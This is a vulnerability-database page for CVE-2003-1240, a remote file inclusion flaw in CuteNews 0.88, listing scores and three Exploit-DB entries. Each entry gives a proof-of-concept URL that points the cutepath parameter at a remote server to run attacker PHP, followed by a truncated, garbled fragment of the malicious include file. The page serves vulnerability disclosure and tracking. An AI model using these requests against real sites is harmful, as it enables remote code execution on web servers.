CVE-2003-1240
published 2003-12-31CVE-2003-1240: PHP remote file inclusion vulnerability in CuteNews 0.88 allows remote attackers to execute arbitrary PHP code via a URL in the cutepath parameter in (1)…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
6.90%
93.3th percentile
PHP remote file inclusion vulnerability in CuteNews 0.88 allows remote attackers to execute arbitrary PHP code via a URL in the cutepath parameter in (1) shownews.php, (2) search.php, or (3) comments.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cutephp | cutenews | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CuteNews 0.88 - 'shownews.php' Remote File Inclusion
exploitdb·2003-02-25
CVE-2003-1240 CuteNews 0.88 - 'shownews.php' Remote File Inclusion
CuteNews 0.88 - 'shownews.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/6935/info
CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.
Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.
If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.
http://www.example.com/cutenews/shownews.php?cutepath=http:///config.php
----------------------------------config.php----------------------------------------
/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?>
Exploit-DB
CuteNews 0.88 - 'comments.php' Remote File Inclusion
exploitdb·2003-02-25
CVE-2003-1240 CuteNews 0.88 - 'comments.php' Remote File Inclusion
CuteNews 0.88 - 'comments.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/6935/info
CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.
Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.
If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.
http://www.example.com/cutenews/comments.php?cutepath=http:///config.php
----------------------------------config.php----------------------------------------
/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?>
Exploit-DB
CuteNews 0.88 - 'search.php' Remote File Inclusion
exploitdb·2003-02-25
CVE-2003-1240 CuteNews 0.88 - 'search.php' Remote File Inclusion
CuteNews 0.88 - 'search.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/6935/info
CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.
Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.
If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.
http://www.example.com/cutenews/search.php?cutepath=http:///config.php
----------------------------------config.php----------------------------------------
/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?>
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2003-02/0320.htmlhttp://www.iss.net/security_center/static/11417.phphttp://www.securityfocus.com/bid/6935http://archives.neohapsis.com/archives/bugtraq/2003-02/0320.htmlhttp://www.iss.net/security_center/static/11417.phphttp://www.securityfocus.com/bid/6935
2003-12-31
Published